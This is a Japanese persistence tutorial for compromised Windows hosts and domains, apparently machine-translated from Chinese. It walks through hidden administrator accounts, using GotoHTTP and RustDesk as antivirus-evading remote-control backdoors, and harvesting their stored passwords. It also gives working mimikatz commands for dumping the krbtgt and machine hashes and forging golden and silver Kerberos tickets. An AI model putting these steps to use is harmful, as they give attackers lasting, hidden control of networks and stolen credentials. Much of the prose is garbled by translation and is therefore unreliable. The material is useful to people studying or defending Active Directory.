Windows 権限のメンテナンス - 金貨と銀貨、隠しユーザー、リモート コントロール、RustDesk、GotoHttp
1. はじめに
権限の維持に関する前回の記事では、ナレッジ ポイントの 1 つでエラーがありました。アカウントの起動メカニズムである DSRM に基づいて、その中のユーザーは krbtgt アカウントを使用する必要があります。ユーザーは使用しないでください。テスト中、それは次の理由によるものでした。ユーザーはドメイン内にありました。長い間検索してもこのユーザーが見つかりませんでした。今日のテスト中に、検索を使用してこのユーザーを見つけましたが、最も重大な問題は、ユーザー内でまだ見つからないことです。ドメイン内のリストは無効になっていますが、見つからないわけではありません。
アカウントの起動メカニズムに基づいて、DSRM は krbtgt アカウントを使用してテストする必要があることに注意してください。krbtgt はキー配布センターのアカウントであるため、通常、このユーザーは誰も管理しません。DSRM パスワードを同期した後、krbtgt アカウントを使用できます。 . ログインします。
1.1. 最初の質問
最初の問題は、リセットに問題があったということでした。インターネット上の多くの記事をチェックし、各記事のスクリーンショットを撮りました。あるいは、ここで有効にするだけで、*記事を書くことができました。くそー、見てください。
実際、その理由は、ユーザー krbtgt が無効になっているためです。同時に、このユーザーを広告ユーザーとコンピュータで直接見つけることができません。検索を使用してこのユーザーを見つけた場合、変更することはできず、プロンプトが表示されます。ローカルアカウントには権限がないこと。
1.1.1. 解決策
このユーザーは AD Management Center で見つかりますが、まだ有効にすることはできません。ただし、パスワードを無期限に変更すると、この問題を解決できます。
2. ユーザーを非表示にする
ユーザーの非表示は、日常のバックドアで最も一般的に使用される操作であり、ユーザーを検出できないように隠すことができます。デフォルトでは、コマンドを使用して追加された非表示ユーザーは照会および削除できますが、ツールを使用して追加された非表示ユーザーは照会しても削除できません。
2.1. ツールの原理
実際、このツールの原則は、ユーザー作成時に $ 記号を追加し、ユーザー グループを空に設定することですが、シングル ドメイン環境ではユーザー グループは空で、ドメイン環境ではユーザー グループが空になります。は管理者グループなので削除できません。
2.2. ケースの操作
ここでは対象のドローンにツールをアップロードして実行するだけですが、現状ではこのツールは必ず強制終了されてしまうので、基本的にはダウンロード時に強制終了されます。
ここでは、スタンドアロンの状況とドメインの状況をテストします。
2.2.1. 単一マシンへのユーザーの追加
ここでは、スタンドアロンの追加とクエリをテストします。
2.2.1.1. ユーザーを追加するツール
CreateHiddenAccount_upx_v0.2.exe -u yaya -p admin@123 ##添加用户
2.2.1.2. 非表示のユーザーを表示するツール
ここでは、このツールに付属のクエリを使用して、非表示のユーザーをクエリします。
CreateHiddenAccount_upx_v0.2.exe -c
2.2.1.3. 非表示のユーザーをローカルで表示する
確かにローカルで非表示のユーザーを表示できることがわかりますが、このユーザーを削除できないことがわかります。実際、これは、前述したように、スタンドアロン バージョンではユーザーのユーザー グループに何も追加されないためです。削除する権利はありません。
2.2.2. ドメインにユーザーを追加する
ここでクエリ ドメイン内に追加してクエリを実行します。
2.2.2.1. ユーザーを追加するツール
CreateHiddenAccount_upx_v0.2.exe -u yaya -p admin@123
2.2.2.2. 非表示のユーザーを表示するツール
CreateHiddenAccount_upx_v0.2.exe -c
2.2.2.3. 非表示のユーザーをローカルで表示する
ここで削除できることがわかりますが、スタンドアロン版では直接削除をクリックすると削除を禁止する旨のメッセージが表示されます。
2.3. 概要
一般的に言えば、現在のユーザーを非表示にする方法は、基本的にはサーバーの問題であり、まず非表示のユーザーにクエリを実行する必要があるため、これはバックドアの方法ですが、現在ではそれほど簡単には使用できません。
3. リモートコントロールソフトウェア
私たちは、Sunflower や Todesk などのリモート コントロール ソフトウェアをよく知っていますが、これらはすべてリモート コントロール ソフトウェアです。このようなリモート コントロール ソフトウェアは、リモート オフィス ソフトウェアであるため、ウイルス対策ソフトウェアによって強制終了されることはありません。ウイルス対策ソフトメーカー 基本的にこれらのソフトウェアはホワイトリストに含まれているため、すべての操作がウイルス対策ソフトによって検出されます。
また、Sunflower はもともとインストール不要で使えるポータブル版がありましたが、以降のバージョンでは上位版であり、RCE の脆弱性があるため、Sunflower をインストールする必要があります。後からビルドして Sunflower を直接使用する場合は、インストールする必要があります。 、ターゲットのリスクが非常に高いため、実際のプロセスでは、権限を維持するために、小規模で軽量なソフトウェアを使用して遠隔制御を実現するようにしてください。
しかし、繰り返しになりますが、このようなツールによってサーバーが頻繁に検査される場合、アップロードは基本的にチェックされますが、これはあまりにも明白です。
3.1. GotoHTTP
GotoHTTP Windows バージョンは緑色のソフトウェアです。右側のリンクをクリックしてソフトウェア パッケージをダウンロードします。ファイル サイズはわずか数百 K です。ソフトウェア パッケージにはファイルが 1 つだけあります。コンピュータ上の場所に解凍して、ダブルクリックしてください。クリックして実行すると、自動的に接続されます。サーバーには、このコンピュータの ID と制御コードも表示されます。
3.1.1. ソフトウェアの実行
このポップアップ ウィンドウは、Windows 7 の実行後に表示されます。コマンド ラインで操作するのはさらに面倒かもしれません。同時に、Windows 7 にもこのポップアップ ウィンドウがあるため、Windows Server 2008 などの古いサーバーでも表示される可能性があります。ですが、Windows10でも問題なく動作します。
3.1.2. リモートでのファイルの読み取り
実行すると、ソフトウェア ディレクトリに設定ファイルが作成されることがわかります。その後、CS を使用して設定ファイルを読み取ることができます。この設定ファイルにはアカウントのパスワードが存在します。
3.1.3. リモートコントロールデスクトップ
下記のWebサイトにログインします。Webサイト上にアカウントとパスワードを入力するところがありますので、ここに入力するだけです。上記のクライアントやサーバーをダウンロードする必要はありません。今は有料なので恥ずかしいです。 。
3.1.4. 概要
このツールの問題点の 1 つは、このツールはネットワークがある場合にのみ使用でき、ネットワークがない場合は使用できないことですが、同時に、トラフィックは https プロトコルを使用するため、ターゲット ホストがポート 443 を開く必要があることです。
簡単に言うと次のとおりです。
ネットワークがあり、制限はなく、使用できます。
ネットワークはありますが、ファイアウォールでポート 443 が制限されている場合は使用できません。
ネットワークや制限もなく使用できますが、場合によっては転送が必要になるため、さらに面倒です。
ネットワークがない、制限がある、基本的に使えない。
同時に、対象ホストがスタンバイ状態の場合、起動するとファイアウォールによってブロックされます。
3.2. ラストデスク
リモート デスクトップ ソフトウェア。箱から出してすぐに使用でき、設定は必要ありません。データを完全に制御できるため、セキュリティについて心配する必要はありません。
3.2.1. RustDeskのリモートバージョン
ここでいうリモコン版とはネットワークから接続できるという意味で、簡単に言うとネットワークがあれば使えるということです。
3.2.1.1. ソフトウェアの実行
このツールはデフォルトでは英語で開きますが、設定で中国語に変更できます。
3.2.1.2. リモートコントロールファイルの読み取り
このツールのアカウントとパスワード ファイルはC:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml次のとおりです。残念ながら、このツールの新しいバージョンではファイルを読み取れない可能性があります。古いバージョンはまだ利用可能です。
3.2.1.3. リモートコントロールデスクトップ
ここで相手のデスクトップに接続できていることがわかりますが、仮想マシンなのでラグがあり、画面の送信が比較的遅いです。
3.2.2. RustDeskのローカルバージョン
ローカル版なのでネットワークは不要で、2つのソフトウェアが同じLAN内にあれば接続可能です。
3.2.2.1. 設定ソフトウェア
こちらも同様に、まずファイルを読み込みC:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk2.toml、以下の内容を追加します。
direct-server = 'Y' ##开启IP连接
direct-access-port = '8443' ##端口
3.2.2.2. リモートデスクトップ
ここではイントラドメイン環境を使っていますが、実際にはネットワークの外に出ずに、相手のIDを入力するところは、このようにIPとポートを直接入力することができます。
IP:8443 ##8443是你再配置文件中修改的端口地址。
3.2.3. 概要
一般的に、このツールは GotoHTTP よりもはるかに便利であり、その主な機能は、ネットワークなしで接続できることと、ウイルス対策ソフトウェアの環境をバイパスできることです。
4. サービスベースの TGT — 金紙幣と銀紙幣
Kerberos プロトコルは、Windows ドメインの認証によく使用されるプロトコルであり、認証プロセス全体がゴールド チケットとシルバー チケットの攻撃シナリオとなります。全体的なプロセスは比較的複雑で、読んだだけでは理解できません。
金紙幣や銀紙幣の所有権は権威維持段階にあり、水平移動段階ではないことに注意してください。
4.1. ゴールデンノート
ゴールデン チケットの原理は、krbtgt ユーザーの TGT チケットを偽造することです。krbtgt ユーザーは、ドメイン コントロールでチケットの管理と発行に使用されるユーザーです。このユーザーの権限があれば、システム内の任意のユーザーを偽造でき、ターゲット ホスト内の任意のサービスにアクセスします。
Kerberos 認証では、クライアントが AS (Identity Authentication Service) によって認証された後、AS はクライアントにログオン セッション キーと TGT を与えますが、ログオン セッション キーは KDC に保存されず、krbtgt の NTLM ハッシュは固定されます。したがって、krbtgt の NTLM ハッシュを取得した後であれば、TGT とログオン セッション キーを偽造して、クライアントと TGS 間の対話の次のステップに進むことができます。ゴールデン チケットを取得すると、AS 認証をスキップでき、アカウントとパスワードを認証する必要がないため、ドメイン管理者のパスワードの変更を心配する必要はありません。
利用条件:krbtgtユーザーのドメイン管理権限とハッシュ値を取得します。
4.1.1. 動作デモ
ここのCSではやらずに直接やりますし、CSでできないことがあれば説明します。
4.1.1.1. ドメイン名とSIDの取得
ここでの SID の最後の 4 桁は必要ないことに注意してください。
whoami ##获取本地账户
net time /domain ##获取域名
whoami /all ##获取sid:S-1-5-21-1695257952-3088263962-2055235443
4.1.1.2. KRBTGT アカウント NTLM の取得
入手するにはmimikatzを使用する必要があります。
privilege::debug
lsadump::lsa /patch /user:krbtgt ##558ae7f88589153355cbeb046ac696df
4.1.1.3. 偽造されたユーザー名
ここでは任意のユーザー名を偽造できますが、ここでは yuto として偽造します。
mimikatz kerberos::golden /user:yuto /domain:xiaodi.local /sid:S-1-5-21-1695257952-3088263962-2055235443 /krbtgt:558ae7f88589153355cbeb046ac696df /ticket:pj
4.1.1.4. メモリのインポート
ここでは、ドメイン内のホストを見つけて、このチケットをインポートしてドメイン コントロールを提供できることがわかります。
kerberos::ptt pj
4.1.2. 概要
ゴールデン チケット、なぜゴールデン チケットと呼ばれるのでしょうか? このチケットは TGT ライフサイクルによって制限されないため、デフォルトでは TGT チケットはデフォルトで 10 時間であり、最大 7 日間更新できます。さらに、このチケットは次のように保存できます。 KRBTGT アカウントのパスワードが変更されない限り、一度変更するとチケットはいつでもアクセスできるようになり、使いやすくなります。
ただし、ゴールデン チケットは二次攻撃でもあります。最初の攻撃はドメイン制御権限を取得することであり、2 番目の攻撃は再度権限を取得することです。同時に、ゴールデン チケットは krbtgt ユーザーの TGT チケットを生成するだけでなく、ただし、krbtgt ユーザーのパスワードはほとんど変更されないため、チケットの安定性は間接的に保証されていますが、別のユーザーの場合、数日に一度変更されるとチケットが無効になる可能性があります。
4.2. シルバーノート
金紙幣は発券券である偽造TGT、銀紙幣はチケットであるSTを偽造したもので、銀紙幣の利点はKDCを通さないため隠蔽性が高いことですが、欠点も明らかで、cifs (ファイル共有サービス)、mssql、winrm (Windows リモート管理)、DNS などの機能の一部しか提供されていません。
使用条件: ログインのハッシュ値であるターゲット マシンのハッシュを取得します。これは必ずしも DC に属しているわけではありませんが、権限を維持し、DC の権限の取得を試みます。
4.2.1. 動作デモ
CSも同様に、ここで操作するのではなく、マシン上で直接操作しますが、CSでも同様です。
4.2.1.1. ドメイン名とSIDの取得
これはゴールデンチケットと同じなので、ここでは説明しません。
whoami
net time /domain
whoami /all
4.2.1.2. DC アカウント NTLM の取得
ここで、これは管理者のアカウントではなくマシン名であることに注意してください。
privilege::debug
sekurlsa::logonpasswords ##f0ff7995e6d3396e869a01e6b465eeaa
4.2.1.3. 偽造されたユーザー名
ここでは任意のユーザー名を偽造できますが、ここでは yuto として偽造します。
- ドメイン: ドメイン名
- sid: ドメイン環境の SID (最後の - 部分と残りのコンテンツを除く)
- target: アクセスするサーバー、FQDN を書き込みます
- rc4: ターゲット ホストの NTLM を書き込みます (hostname$ は NTLM に対応します)
- service: アクセスするリソースの種類
- ユーザー: 偽ユーザー
- cifs:共有ファイル
実際、インポート後は確かにチケットがあるのですが、使い方が非常に面倒です ここでは、対象のサービスが cifs にあります。つまり、cifs サービスが存在する場合にのみ使用できます。ターゲットホスト。
kerberos::golden /user:yuto /domain:xiaodi.local /sid:S-1-5-21-1695257952-3088263962-2055235443 /target:DC /service:cifs /rc4:f0ff7995e6d3396e869a01e6b465eeaa /ptt
kerberos::golden /user:xxx用户名 /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash /ptt
4.2.2. 概要
銀貨には悪用できる制限が非常に多くあります。
4.3. 概要
金札と銀札について簡単にまとめました。
ゴールデン チケット: ドメイン コントローラーの ktbtgt アカウントのハッシュをキャプチャしてクライアント側で TGT チケットを生成し、そのチケットはすべてのマシン上のすべてのサービスに適用されます。
シルバー チケット: 実際には、ドメイン コントロール サービスのハッシュがキャプチャされると、クライアント側で通常のドメイン ユーザーとして TGS チケットが生成され、特定のマシン上の特定のサービス用です。生成されたシルバー チケットは、指定されたもののみです。指定されたターゲット マシンのサービスにアクセスできます。